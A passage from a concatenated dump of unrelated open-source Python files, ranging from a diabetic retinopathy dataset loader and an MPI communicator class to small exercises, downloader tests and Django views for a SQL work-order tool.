config=level).as_dataset(split=["train", "validation", "test"],
shuffle_files=True,
batch_size=batch_size)
except AssertionError as ae:
raise AssertionError(
str(ae) +
" Run DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()"
" first and then retry.")
# Parse task level
level = level if isinstance(level, Level) else Level.from_str(level)
# Dataset tranformations
transforms_train, transforms_eval = cls._preprocessors()
# Apply transformations
ds_train = ds_train.map(transforms_train,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
ds_validation = ds_validation.map(
transforms_eval, num_parallel_calls=tf.data.experimental.AUTOTUNE)
ds_test = ds_test.map(transforms_eval,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
# Prefetches datasets to memory
ds_train = ds_train.prefetch(tf.data.experimental.AUTOTUNE)
ds_validation = ds_validation.prefetch(tf.data.experimental.AUTOTUNE)
ds_test = ds_test.prefetch(tf.data.experimental.AUTOTUNE)
if as_numpy:
# Convert to NumPy iterators
ds_train = tfds.as_numpy(ds_train)
ds_validation = tfds.as_numpy(ds_validation)
ds_test = tfds.as_numpy(ds_test)
return DataSplits(ds_train, ds_validation, ds_test)
@classmethod
def download_and_prepare(cls, levels=None) -> None:
"""Downloads dataset from Kaggle, extracts zip files and processes it using
`tensorflow_datasets`.
Args:
levels: (optional) `iterable` of `str`, specifies which
levels from {'medium', 'realworld'} to prepare,
if None it prepares all the levels.
Raises:
OSError: if `~/.kaggle/kaggle.json` is not set up.
"""
# Disable GPU for data download, extraction and preparation
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
cls._download()
# cls._extract()
#cls._prepare(levels)
@staticmethod
def _download() -> None:
"""Downloads data from Kaggle using `tensorflow_datasets`.
Raises:
OSError: if `~/.kaggle/kaggle.json` is not set up.
"""
import subprocess as sp
import tensorflow_datasets as tfds
# Append `/home/$USER/.local/bin` to path
os.environ["PATH"] += ":/home/{}/.local/bin/".format(os.environ["USER"])
# Download all files from Kaggle
drd = tfds.download.kaggle.KaggleCompetitionDownloader(
"diabetic-retinopathy-detection")
try:
for dfile in drd.competition_files:
drd.download_file(dfile,
output_dir=_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)
except sp.CalledProcessError as cpe:
raise OSError(
str(cpe) + "." +
" Make sure you have ~/.kaggle/kaggle.json setup, fetched from the Kaggle website"
" https://www.kaggle.com/<username>/account -> 'Create New API Key'."
" Also accept the dataset license by going to"
" https://www.kaggle.com/c/diabetic-retinopathy-detection/rules"
" and look for the button 'I Understand and Accept' (make sure when reloading the"
" page that the button does not pop up again).")
@staticmethod
def _extract() -> None:
"""Extracts zip files downloaded from Kaggle."""
import glob
import tqdm
import zipfile
import tempfile
# Extract train and test original images
for split in ["train", "test"]:
# Extract "<split>.zip.00*"" files to "<split>"
with tempfile.NamedTemporaryFile() as tmp:
# Concatenate "<split>.zip.00*" to "<split>.zip"
for fname in tqdm.tqdm(
sorted(
glob.glob(
os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR,
"{split}.zip.00*".format(split=split))))):
# Unzip "<split>.zip" to "<split>"
with open(fname, "rb") as ztmp:
tmp.write(ztmp.read())
with zipfile.ZipFile(tmp) as zfile:
for image in tqdm.tqdm(iterable=zfile.namelist(),
total=len(zfile.namelist())):
zfile.extract(member=image,
path=_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)
# Delete "<split>.zip.00*" files
for splitzip in os.listdir(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR):
if "{split}.zip.00".format(split=split) in splitzip:
os.remove(
os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR, splitzip))
# Extract "sample.zip", "trainLabels.csv.zip"
for fname in ["sample", "trainLabels.csv"]:
zfname = os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR,
"{fname}.zip".format(fname=fname))
with zipfile.ZipFile(zfname) as zfile:
zfile.extractall(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)
os.remove(zfname)
@staticmethod
def _prepare(levels=None) -> None:
"""Generates the TFRecord objects for medium and realworld experiments."""
import multiprocessing
from absl import logging
from .tfds_adapter import DiabeticRetinopathyDiagnosis
# Hangle each level individually
for level in levels or ["medium", "realworld"]:
dtask = DiabeticRetinopathyDiagnosis(data_dir=DATA_DIR, config=level)
logging.debug("=== Preparing TFRecords for {} ===".format(level))
dtask.download_and_prepare()
@classmethod
def _preprocessors(cls) -> Tuple[transforms.Transform, transforms.Transform]:
"""Applies transformations to the raw data."""
import tensorflow_datasets as tfds
# Transformation hyperparameters
mean = np.asarray([0.42606387, 0.29752496, 0.21309826])
stddev = np.asarray([0.27662534, 0.20280295, 0.1687619])
class Parse(transforms.Transform):
"""Parses datapoints from raw `tf.data.Dataset`."""
def __call__(self, x, y=None):
"""Returns `as_supervised` tuple."""
return x["image"], x["label"]
class CastX(transforms.Transform):
"""Casts image to `dtype`."""
def __init__(self, dtype):
"""Constructs a type caster."""
self.dtype = dtype
def __call__(self, x, y):
"""Returns casted image (to `dtype`) and its (unchanged) label as
tuple."""
return tf.cast(x, self.dtype), y
class To01X(transforms.Transform):
"""Rescales image to [min, max]=[0, 1]."""
def __call__(self, x, y):
"""Returns rescaled image and its (unchanged) label as tuple."""
return x / 255.0, y
# Get augmentation schemes
[augmentation_config,
no_augmentation_config] = cls._ImageDataGenerator_config()
# Transformations for train dataset
transforms_train = transforms.Compose([
Parse(),
CastX(tf.float32),
To01X(),
transforms.Normalize(mean, stddev),
# TODO(filangel): hangle batch with ImageDataGenerator
# transforms.RandomAugment(**augmentation_config),
])
# Transformations for validation/test dataset
transforms_eval = transforms.Compose([
Parse(),
CastX(tf.float32),
To01X(),
transforms.Normalize(mean, stddev),
# TODO(filangel): hangle batch with ImageDataGenerator
# transforms.RandomAugment(**no_augmentation_config),
])
return transforms_train, transforms_eval
@staticmethod
def _ImageDataGenerator_config():
"""Returns the configs for the
`tensorflow.keras.preprocessing.image.ImageDataGenerator`, used for the
random augmentation of the dataset, following the implementation of
https://github.com/chleibig/disease-detection/blob/f3401b26aa9b832ff77afe93
e3faa342f7d088e5/scripts/inspect_data_augmentation.py."""
augmentation_config = dict(
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=180.0,
width_shift_range=0.05,
height_shift_range=0.05,
shear_range=0.,
zoom_range=0.10,
channel_shift_range=0.,
fill_mode="constant",
cval=0.,
horizontal_flip=True,
vertical_flip=True,
data_format="channels_last",
)
no_augmentation_config = dict(
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=0.0,
width_shift_range=0.0,
height_shift_range=0.0,
shear_range=0.,
zoom_range=0.0,
channel_shift_range=0.,
fill_mode="nearest",
cval=0.,
horizontal_flip=False,
vertical_flip=False,
data_format="channels_last",
)
return augmentation_config, no_augmentation_config
|
setup.py | stjordanis/MONeT-1 | 161 | 8376 | <filename>setup.py
import setuptools
setuptools.setup(
name="monet_memory_optimized_training",
version="0.0.1",
description="Memory Optimized Network Training Framework",
url="https://github.com/philkr/lowrank_conv",
packages=setuptools.find_packages(include = ['monet', 'monet.*', 'models', 'checkmate', 'gist']),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
|
hoomd/communicator.py | EdwardZX/hoomd-blue | 204 | 8400 | # Copyright (c) 2009-2021 The Regents of the University of Michigan
# This file is part of the HOOMD-blue project, released under the BSD 3-Clause
# License.
"""MPI communicator."""
from hoomd import _hoomd
import hoomd
import contextlib
class Communicator(object):
"""MPI communicator.
Args:
mpi_comm: Accepts an mpi4py communicator. Use this argument to perform
many independent hoomd simulations where you communicate between those
simulations using mpi4py.
ranks_per_partition (int): (MPI) Number of ranks to include in a
partition.
`Communicator` initialize MPI communications for a `hoomd.Simulation`. To
use MPI, launch your Python script with an MPI launcher (e.g. ``mpirun`` or
``mpiexec``). By default, `Communicator` uses all ranks provided by the
launcher ``num_launch_ranks`` for a single `hoomd.Simulation` object which
decomposes the state onto that many domains.
Set ``ranks_per_partition`` to an integer to partition launched ranks into
``num_launch_ranks / ranks_per_partition`` communicators, each with their
own `partition` index. Use this to perform many simulations in parallel, for
example by using `partition` as an index into an array of state points to
execute.
"""
def __init__(self, mpi_comm=None, ranks_per_partition=None):
# check ranks_per_partition
if ranks_per_partition is not None:
if not hoomd.version.mpi_enabled:
raise RuntimeError(
"The ranks_per_partition option is only available in MPI.\n"
)
mpi_available = hoomd.version.mpi_enabled
self.cpp_mpi_conf = None
# create the specified configuration
if mpi_comm is None:
self.cpp_mpi_conf = _hoomd.MPIConfiguration()
else:
if not mpi_available:
raise RuntimeError("mpi_comm is not supported in serial builds")
handled = False
# pass in pointer to MPI_Comm object provided by mpi4py
try:
import mpi4py
if isinstance(mpi_comm, mpi4py.MPI.Comm):
addr = mpi4py.MPI._addressof(mpi_comm)
self.cpp_mpi_conf = \
_hoomd.MPIConfiguration._make_mpi_conf_mpi_comm(addr)
handled = True
except ImportError:
# silently ignore when mpi4py is missing
pass
# undocumented case: handle plain integers as pointers to MPI_Comm
# objects
if not handled and isinstance(mpi_comm, int):
self.cpp_mpi_conf = \
_hoomd.MPIConfiguration._make_mpi_conf_mpi_comm(mpi_comm)
handled = True
if not handled:
raise RuntimeError(
"Invalid mpi_comm object: {}".format(mpi_comm))
if ranks_per_partition is not None:
# check validity
if (self.cpp_mpi_conf.getNRanksGlobal() % ranks_per_partition):
raise RuntimeError('Total number of ranks is not a multiple of '
'ranks_per_partition.')
# split the communicator into partitions
self.cpp_mpi_conf.splitPartitions(ranks_per_partition)
@property
def num_ranks(self):
"""int: The number of ranks in this partition.
When initialized with ``ranks_per_partition=None``, `num_ranks` is equal
to the ``num_launch_ranks`` set by the MPI launcher. When using
partitions, `num_ranks` is equal to ``ranks_per_partition``.
Note:
Returns 1 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getNRanks()
else:
return 1
@property
def rank(self):
"""int: The current rank within the partition.
Note:
Returns 0 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getRank()
else:
return 0
@property
def num_partitions(self):
"""int: The number of partitions in this execution.
Create partitions with the ``ranks_per_partition`` argument on
initialization. Then, the number of partitions is
``num_launch_ranks / ranks_per_partition``.
Note:
Returns 1 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getNPartitions()
else:
return 1
@property
def partition(self):
"""int: The current partition.
Note:
Returns 0 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getPartition()
else:
return 0
def barrier_all(self):
"""Perform a MPI barrier synchronization across all ranks.
Note:
Does nothing in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
_hoomd.mpi_barrier_world()
def barrier(self):
"""Perform a barrier synchronization across all ranks in the partition.
Note:
Does nothing in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
self.cpp_mpi_conf.barrier()
@contextlib.contextmanager
def localize_abort(self):
"""Localize MPI_Abort to this partition.
HOOMD calls ``MPI_Abort`` to tear down all running MPI processes
whenever there is an uncaught exception. By default, this will abort the
entire MPI execution. When using partitions, an uncaught exception on
one partition will therefore abort all of them.
Use the return value of :py:meth:`localize_abort()` as a context manager
to tell HOOMD that all operations within the context will use only
that MPI communicator so that an uncaught exception in one partition
will only abort that partition and leave the others running.
"""
global _current_communicator
prev = _current_communicator
_current_communicator = self
yield None
_current_communicator = prev
# store the "current" communicator to be used for MPI_Abort calls. This defaults
# to the world communicator, but users can opt in to a more specific
# communicator using the Device.localize_abort context manager
_current_communicator = Communicator()
|
pymclevel/test/__init__.py | bennettdc/MCEdit-Unified | 673 | 8412 | __author__ = 'Rio'
|
Python/other/merge_interval.py | TechSpiritSS/NeoAlgo | 897 | 8424 | '''
Given an array of intervals, merge all overlapping intervals,
and return an array of the non-overlapping intervals that cover all the intervals in the input.
Input: intervals = [[1,3],[2,6],[8,10],[15,18]]
Output: [[1,6],[8,10],[15,18]]
Explanation: Since intervals [1,3] and [2,6] overlaps, merge them into [1,6].
'''
def merge(intervals):
#sort the array
intervals.sort()
#take another empty list
intervals_stack = []
for pair in intervals:
if len(intervals_stack) == 0:
intervals_stack.append(pair) #adding all the number in intervals elements in empty list
#check number is equal or greater and less than pop elements
else:
current_pair = intervals_stack[-1]
if current_pair[1]>=pair[0]:
intervals_stack.pop()
if current_pair[1]<pair[1]:
new_pair = [current_pair[0],pair[1]]
intervals_stack.append(new_pair)
else:
new_pair = [current_pair[0],current_pair[1]]
intervals_stack.append(new_pair)
else:
intervals_stack.append(pair)
# result
return intervals_stack
if __name__ == '__main__':
R = int(input("Enter the number of rows:"))
C = int(input("Enter the number of columns:"))
interval = [[int(input("Enter the elements: ")) for x in range (C)] for y in range(R)]
print("Overlapping interval: ",interval)
print("Non-overlapping intervals: ",merge(interval))
"""
Time complexity : O(n^2)
Space complexity : O(n^2)
INPUT:-
Enter the number of rows:4
Enter the number of columns:2
Enter the elements: 1
Enter the elements: 3
Enter the elements: 2
Enter the elements: 6
Enter the elements: 8
Enter the elements: 10
Enter the elements: 15
Enter the elements: 18
OUTPUT:-
Overlapping interval: [[1, 3], [2, 6], [8, 10], [15, 18]]
Non-overlapping intervals: [[1, 6], [8, 10], [15, 18]]
"""
|
test/regression/features/arithmetic/mult.py | ppelleti/berp | 137 | 8438 | print(18 * 1234)
print(18 * 1234 * 2)
print(0 * 1)
print(1 * 0)
print(0.0 * 1.0)
print(1.0 * 0.0)
|
src/nile/core/run.py | kootsZhin/nile | 121 | 8469 | """Command to run Nile scripts."""
import logging
from importlib.machinery import SourceFileLoader
from nile.nre import NileRuntimeEnvironment
def run(path, network):
"""Run nile scripts passing on the NRE object."""
logger = logging.getLogger()
logger.disabled = True
script = SourceFileLoader("script", path).load_module()
nre = NileRuntimeEnvironment(network)
script.run(nre)
|
Python/Basic Data Types/Lists/Solution.py | PawarAditi/HackerRank | 219 | 8470 | <reponame>PawarAditi/HackerRank
array = []
for _ in range(int(input())):
command = input().strip().split(" ")
cmd_type = command[0]
if (cmd_type == "print"):
print(array)
elif (cmd_type == "sort"):
array.sort()
elif (cmd_type == "reverse"):
array.reverse()
elif (cmd_type == "pop"):
array.pop()
elif (cmd_type == "remove"):
array.remove(int(command[1]))
elif (cmd_type == "append"):
array.append(int(command[1]))
elif (cmd_type == "insert"):
array.insert(int(command[1]), int(command[2])) |
scribdl/test/test_download.py | fatshotty/scribd-downloader | 182 | 8482 | <filename>scribdl/test/test_download.py
from ..downloader import Downloader
import os
import pytest
@pytest.fixture
def cwd_to_tmpdir(tmpdir):
os.chdir(str(tmpdir))
def test_audiobook_download(cwd_to_tmpdir, monkeypatch):
audiobook_url = "https://www.scribd.com/audiobook/237606860/100-Ways-to-Motivate-Yourself-Change-Your-Life-Forever"
audiobook_downloader = Downloader(audiobook_url)
audio = audiobook_downloader.download()
assert audio[0] == "100_Ways_to_Motivate_Yourself__Change_Your_Life_Forever_preview.mp3"
assert os.path.getsize(audio[0]) == 2127830
def test_text_document_download(cwd_to_tmpdir):
text_doc_url = "https://www.scribd.com/document/96882378/Trademark-License-Agreement"
text_downloader = Downloader(text_doc_url)
md_doc = text_downloader.download(is_image_document=False)
assert os.path.getsize(md_doc.input_content) in range(1000, 2000)
md_doc.to_pdf()
assert os.path.getsize(md_doc.pdf_path) in range(20000, 31000)
def test_img_document_download(cwd_to_tmpdir):
img_doc_url = "https://www.scribd.com/doc/136711944/Signature-Scanning-and-Verification-in-Finacle"
img_downloader = Downloader(img_doc_url)
imgs = img_downloader.download(is_image_document=True)
assert len(imgs.input_content) == 2
imgs.to_pdf()
assert os.path.getsize(imgs.pdf_path) in range(140000, 150000)
def test_book_download(cwd_to_tmpdir, monkeypatch):
book_url = "https://www.scribd.com/read/262694921/Acting-The-First-Six-Lessons"
book_downloader = Downloader(book_url)
# We don't want to clutter stdout with book contents if this test fails
monkeypatch.setattr("builtins.print", lambda x: None)
md_book = book_downloader.download()
assert os.path.getsize(md_book.input_content) in range(10000, 20000)
md_book.to_pdf()
assert os.path.getsize(md_book.pdf_path) in range(200000, 2500000)
|
yasql/apps/sqlorders/views.py | Fanduzi/YaSQL | 443 | 8485 | # -*- coding:utf-8 -*-
# edit by fuzongfei
import base64
import datetime
# Create your views here.
import json
from django.http import Http404, HttpResponse
from django.utils import timezone
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters
from rest_framework.exceptions import PermissionDenied
from rest_framework.generics import ListAPIView, GenericAPIView, CreateAPIView, UpdateAPIView, DestroyAPIView
from rest_framework.views import APIView
from rest_framework.viewsets import ViewSet
from libs import permissions
from libs.Pagination import Pagination
from libs.RenderColumns import render_dynamic_columns
from libs.response import JsonResponseV1
from sqlorders import models, serializers
from sqlorders.filters import SqlOrderListFilter, GetTasksListFilter
class GetDBEnvironment(ListAPIView):
queryset = models.DbEnvironment.objects.all()
serializer_class = serializers.DbEnvironmentSerializer
# 获取工单环境
def get(self, request, *args, **kwargs):
serializer = self.get_serializer(self.get_queryset(), many=True)
return JsonResponseV1(data=serializer.data)
class GetDbSchemas(APIView):
# 获取指定环境指定用途的schemas列表
def get(self, request):
serializer = serializers.DbSchemasSerializer(data=request.query_params)
if serializer.is_valid():
return JsonResponseV1(data=serializer.query)
return JsonResponseV1(message=serializer.errors, code='0001')
class IncepSyntaxCheckView(APIView):
def post(self, request, *args, **kwargs):
serializer = serializers.IncepSyntaxCheckSerializer(data=request.data)
if serializer.is_valid():
s, data = serializer.check()
render_columns = [
{'key': 'order_id', 'value': '序号'},
{'key': 'stage', 'value': '阶段'},
{'key': 'stage_status', 'value': '阶段状态'},
{'key': 'error_level', 'value': '错误级别'},
{'key': 'error_message', 'value': '错误信息', 'width': '35%'},
{'key': 'sql', 'value': 'SQL内容', 'width': '25%', 'ellipsis': True},
{'key': 'affected_rows', 'value': '影响/扫描行数'}
]
columns = render_dynamic_columns(render_columns)
message = '语法检查未发现异常,可以提交'
if not s:
message = '语法检查发现异常,详情请查看输出,更正后在提交'
d = {
'status': 0 if s else 1,
'data': data
}
data = {'columns': columns, 'data': d}
return JsonResponseV1(data=data, message=message)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class SqlOrdersCommit(GenericAPIView):
permission_classes = (permissions.CanCommitOrdersPermission,)
serializer_class = serializers.SqlOrdersCommitSerializer
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="提交成功")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class SqlOrdersList(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrders.objects.all()
serializer_class = serializers.SqlOrdersListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = SqlOrderListFilter
ordering = ['-created_at']
search_fields = ['title', 'database', 'remark', 'applicant', 'progress', 'contents']
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, many=True)
render_columns = [
{'key': 'progress', 'value': '进度', 'width': '8%'},
{'key': 'applicant', 'value': '申请人'},
{'key': 'department', 'value': '部门'},
{'key': 'env_name', 'value': '环境'},
{'key': 'escape_title', 'value': '标题', 'width': '18%', 'ellipsis': True},
{'key': 'sql_type', 'value': '类型'},
{'key': 'remark', 'value': '备注'},
{'key': 'version', 'value': '版本'},
{'key': 'host', 'value': '实例/库'},
{'key': 'auditor', 'value': '审核人'},
{'key': 'reviewer', 'value': '复核人'},
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class SqlOrdersDetail(ListAPIView):
"""SQL工单详情"""
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrders.objects.all()
serializer_class = serializers.SqlOrderDetailSerializer
lookup_field = 'order_id'
def get(self, request, *args, **kwargs):
queryset = self.get_object()
serializer = self.get_serializer(queryset, context={"request": request})
return JsonResponseV1(data=serializer.data)
class OpSqlOrderView(ViewSet):
"""更新SQL工单状态,如:审核,关闭等"""
permission_classes = (permissions.CanViewOrdersPermission,)
def get_obj(self, pk):
try:
obj = models.DbOrders.objects.get(pk=pk)
return obj
except models.DbOrders.DoesNotExist:
raise Http404
def approve(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_approve"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def feedback(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_feedback"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def close(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_close"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def review(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_review"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
class GenerateTasksView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.GenerateSqlOrdersTasksSerializer(data=request.data)
if serializer.is_valid():
data = serializer.save(request)
return JsonResponseV1(data=data)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class GetTaskIdView(APIView):
def get(self, request, *args, **kwargs):
"""根据order id返回taskid"""
order_id = kwargs.get('order_id')
task_id = models.DbOrdersExecuteTasks.objects.filter(order_id=order_id).first().task_id
return JsonResponseV1(data=task_id)
class GetTasksPreviewView(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.SqlOrdersTasksListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = GetTasksListFilter
search_fields = ['sql']
ordering = ['created_time']
def get(self, request, *args, **kwargs):
task_id = kwargs.get('task_id')
queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id))
# 数据隐藏按钮打开了
# 仅允许申请人、审核人、复核人和超权用户查看数据
obj = models.DbOrders.objects.get(
pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id
)
if obj.is_hide == 'ON' and not request.user.is_superuser:
allowed_view_users = [obj.applicant]
allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)])
allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)])
if request.user.username not in allowed_view_users:
raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')
origin_queryset = self.queryset.filter(task_id=task_id)
total = origin_queryset.count()
progress_0 = origin_queryset.filter(progress=0).count()
progress_1 = origin_queryset.filter(progress=1).count()
progress_3 = origin_queryset.filter(progress=3).count()
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, context={'request': request}, many=True)
render_columns = [
{'key': 'num', 'value': '序号'}, # 自定义num,前台显示序号使用
{'key': 'applicant', 'value': '申请人'},
{'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'},
{'key': 'progress', 'value': '进度'},
{'key': 'result', 'value': '查看结果'}, # 自定义result
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns,
'data': {'data': serializer.data,
'total': total,
'progress_0': progress_0,
'progress_1': progress_1,
'progress_3': progress_3}}
return self.get_paginated_response(data)
class GetTasksListView(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.SqlOrdersTasksListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = GetTasksListFilter
search_fields = ['sql']
ordering = ['created_time']
def get(self, request, *args, **kwargs):
task_id = kwargs.get('task_id')
queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id))
# 数据隐藏按钮打开了
# 仅允许申请人、审核人、复核人和超权用户查看数据
obj = models.DbOrders.objects.get(
pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id
)
if obj.is_hide == 'ON' and not request.user.is_superuser:
allowed_view_users = [obj.applicant]
allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)])
allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)])
if request.user.username not in allowed_view_users:
raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, context={'request': request}, many=True)
render_columns = [
{'key': 'num', 'value': '序号'}, # 自定义num,前台显示序号使用
{'key': 'applicant', 'value': '申请人'},
{'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'},
{'key': 'progress', 'value': '进度'},
{'key': 'execute', 'value': '执行'}, # 自定义execute
{'key': 'result', 'value': '查看结果'}, # 自定义result
]
if queryset.exists():
if queryset.first().sql_type == 'DDL':
render_columns.insert(-1, {'key': 'ghost_pause', 'value': '暂停(gh-ost)'})
render_columns.insert(-1, {'key': 'ghost_recovery', 'value': '恢复(gh-ost)'})
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class ExecuteSingleTaskView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ExecuteSingleTaskSerializer(data=request.data)
if serializer.is_valid():
serializer.execute(request)
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class ExecuteMultiTasksView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ExecuteMultiTasksSerializer(data=request.data)
if serializer.is_valid():
serializer.execute(request)
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class ThrottleTaskView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ThrottleTaskSerializer(data=request.data)
if serializer.is_valid():
message = serializer.execute(request)
return JsonResponseV1(message=message)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class GetTasksResultView(ListAPIView):
"""SQL工单详情"""
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.GetTasksResultSerializer
lookup_field = 'id'
def get(self, request, *args, **kwargs):
queryset = self.get_object()
serializer = self.get_serializer(queryset, context={"request": request})
return JsonResponseV1(data=serializer.data)
class HookSqlOrdersView(APIView):
permission_classes = (permissions.anyof(permissions.CanCommitOrdersPermission,
permissions.CanViewOrdersPermission,
permissions.CanExecuteOrdersPermission,
permissions.CanAuditOrdersPermission),
)
def post(self, request, *args, **kwargs):
serializer = serializers.HookSqlOrdersSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class DownloadExportFilesView(APIView):
"""下载导出文件"""
permission_classes = (permissions.CanViewOrdersPermission,)
def get(self, request, base64_filename):
file_name = base64.b64decode(base64_filename).decode()
if not models.DbExportFiles.objects.filter(file_name=file_name).exists():
raise Http404
obj = models.DbExportFiles.objects.get(file_name=file_name)
if not models.DbOrdersExecuteTasks.objects.get(pk=obj.task_id).applicant == request.user.username:
raise PermissionDenied(detail='您没有权限')
fsock = open(f"media/{obj.files}", 'rb')
response = HttpResponse(fsock, content_type="application/zip")
response['Content-Disposition'] = f'attachment; filename={file_name}'
return response
class ReleaseVersionsGet(APIView):
"""获取上线版本号,提交工单使用"""
def get(self, request):
before_30_days = (timezone.now() - datetime.timedelta(days=30))
queryset = models.ReleaseVersions.objects.filter(
expire_time__gte=before_30_days
).values('id', 'version', 'expire_time').order_by('-created_at')
for row in queryset:
row['disabled'] = 0
if row['expire_time'] < datetime.datetime.date(timezone.now()):
row['disabled'] = 1
return JsonResponseV1(data=queryset)
class ReleaseVersionsList(ListAPIView):
"""获取上线版本号列表,管理上线版本号使用"""
permission_classes = (permissions.CanViewVersionPermission,)
queryset = models.ReleaseVersions.objects.all()
serializer_class = serializers.ReleaseVersionsListSerializer
pagination_class = Pagination
filter_backends = [filters.SearchFilter, filters.OrderingFilter]
search_fields = ['username', 'version', 'expire_time']
ordering = ['-created_at']
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, many=True)
render_columns = [
{'key': 'version', 'value': '版本'},
{'key': 'username', 'value': '创建人'},
{'key': 'expire_time', 'value': '截止日期'},
{'key': 'created_at', 'value': '创建时间'},
{'key': 'key', 'value': '操作'},
{'key': 'id', 'value': '详情'},
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class ReleaseVersionsCreate(CreateAPIView):
"""创建版本"""
permission_classes = (permissions.CanCreateVersionsPermission,)
